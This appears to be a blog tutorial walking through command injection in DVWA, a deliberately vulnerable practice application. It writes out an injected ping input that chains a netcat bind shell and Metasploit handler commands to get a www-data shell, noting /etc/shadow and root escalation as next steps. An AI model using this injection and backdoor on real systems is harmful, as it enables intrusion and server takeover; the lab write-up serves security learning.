Did you know that you can navigate the posts by swiping left and right?
Command Injection is the manipulation of a vulnerable software in order to execute arbitrary commands on the host operating system. Command Injections are possible when the application skips the input validation and uses it for executing a shell command on the host operating system. in this post we’ll get our hands on DVWA’s Command Injection section, and we’ll open a backdoor on the server using Metasploit.
Visit the Command Injection section of DVWA.
The page says that it will ping an IP address for us, so let’s see what will do for the IP 127.0.0.1:
Now, let’s try to append a list bash command after our input IP address:
Sweet, DVWA simply appends our input to the underlying bash command!
Now, let’s listen on port 4444 using netcat and redirect all the incoming bytes to a bash shell:
127.0.0.1; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe
As you will notice, the page is loading forever, which means that our backdoor is open and waiting for us…
Let’s start msfconsole and open the shell on the server:
msfconsole use exploit/multi/handler set payload linux/x64/shell/bind_tcp set RHOST 127.0.0.1
Note that we didn’t set the LPORT of bind_tcp, since the default one is 4444.
As you can see, we are the www-data user, and that’s why we can’t read the /etc/shadow file, which contains the user passwords of the operating system. But, we have all the privileges that www-data user has and we can e.g. modify DVWA or escalate to root, by exploiting a local privilege escalation vulnerability.